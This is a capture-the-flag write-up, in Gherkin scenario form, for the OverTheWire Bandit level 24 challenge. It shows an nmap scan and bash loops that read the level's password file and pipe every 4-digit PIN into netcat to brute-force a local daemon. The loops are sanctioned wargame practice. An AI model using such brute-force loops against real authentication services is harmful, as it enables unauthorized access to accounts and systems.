## Version 2.0
## language: en

Feature:
  Site:
    www.overthewire.org
  Category:
    Wargame - CTF
  User:
    34edprado
  Goal:
    Capture the Flag to the next level

  Background:
  Hacker's software:
    | <Software name> | <Version>     |
    | Ubuntu          | 18.04.5 LTS   |
    | Brave           | V1.21.76      |
    | SSH             | OpenSSH_7.6p1 |
    | Nmap            | 7.4.0         |
    | Netcat          | v1.10-41+b1   |
  Machine information:
    Given the challenge URL
    """
    https://overthewire.org/wargames/bandit/bandit25.html
    """
    When I open the challenge URL using Brave
    Then I see the text
    """
    A daemon is listening on port 30002 and will give you the password
    for bandit25 if given the password for bandit24
    and a secret numeric 4-digit pincode.
    There is no way to retrieve the pincode
    except by going through all of the 10000 combinations, called brute-forcing
    """
    When I connect to the remote server via SSH
    """
    $ ssh bandit24@176.9.9.172 -p 2220
    """
    And I run a quick scan using nmap
    """
    $ nmap -p 1-40000 localhost
    """
    Then I get the following output
    """
      Host is up (0.00030s latency).
      Not shown: 39989 closed ports
      PORT      STATE SERVICE
      22/tcp    open  ssh
      113/tcp   open  ident
      6010/tcp  open  x11
      30000/tcp open  ndmps
      30001/tcp open  pago-services1
      30002/tcp open  pago-services2
      31046/tcp open  unknown
      31518/tcp open  unknown
      31691/tcp open  unknown
      31790/tcp open  unknown
      31960/tcp open  unknown
    """
    And I see the daemon 'pago-services2' running on port 30002

  Scenario: Fail:Use the wrong command syntax
    Given I need to bruteforce a 4 digit pincode
    When I try the following command
    """
    $ for i in {0000..9999};do echo $(cat /etc/bandit_pass/bandit24) \
    | nc localhost 30002 $i; done
    """
    Then I get several error messages [evidence](fail.png)
    """
    Wrong! Please enter the correct pincode. Try again.
    Timeout. Exiting.
    """
    And I can not capture the flag


  Scenario: Success:Use the commands in the correct order
    Given The previous fail scenario
    When I search over the internet for the correct use of a bruteforce with nc
    Then I realize I got the command in the wrong order
    """
    $ for i in {0000..9999};do echo $(cat /etc/bandit_pass/bandit24) $i; done |
    | nc localhost 30002
    """
    When I try the previous command
    Then I get the correct pincode after many attempts [evidence](success.png)
    And I capture the flag
